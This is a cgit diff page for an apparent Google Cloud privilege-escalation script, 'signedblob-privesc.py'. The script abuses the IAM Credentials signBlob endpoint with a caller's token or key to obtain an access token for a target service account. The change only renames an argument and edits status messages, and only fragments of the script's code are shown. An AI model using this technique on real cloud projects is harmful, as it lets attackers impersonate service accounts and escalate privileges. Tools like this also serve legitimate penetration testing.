summaryrefslogtreecommitdiff
path: root/signedblob-privesc.py
diff options
context:
space:
mode:
Diffstat (limited to 'signedblob-privesc.py')
-rw-r--r--signedblob-privesc.py8
1 files changed, 3 insertions, 5 deletions
diff --git a/signedblob-privesc.py b/signedblob-privesc.py
index b0c701b..d105261 100644
--- a/signedblob-privesc.py
+++ b/signedblob-privesc.py
@@ -34,10 +34,8 @@ def getTokenFromKeyFile(keyfile_path):
return creds.token
def executeSignBlob(bearer_token, target_sa):
- print("[*] Constructing a JWT")
unsigned_jwt = createJwt(target_sa)
- print("[*] Getting a signed Blob")
sign_url = f"https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/{target_sa}:signBlob"
headers = {
"Authorization": f"Bearer {bearer_token}",
@@ -73,7 +71,7 @@ def main():
group.add_argument("-f", "--token-file", help="Path to file containing Access Token")
group.add_argument("-k", "--key-file", help="Path to Service Account JSON key file")
- parser.add_argument("-s", "--target", required=True, help="Target Service Account Email")
+ parser.add_argument("-s", "--target-account", required=True, help="Target Service Account Email")
args = parser.parse_args()
caller_token = None
@@ -89,9 +87,9 @@ def main():
print("[!] Could not retrieve a valid caller token.")
sys.exit(1)
- result = executeSignBlob(caller_token, args.target)
+ result = executeSignBlob(caller_token, args.target_account)
if result:
- print("[*] Got Token:")
+ print(f"[*] Successfully retrieved Access Token for {args.target_account}")
print(json.dumps(result, indent=2))
if __name__ == "__main__":
generated by cgit v1.2.3 (git 2.39.1) at 2026-04-11 22:30:46 +0000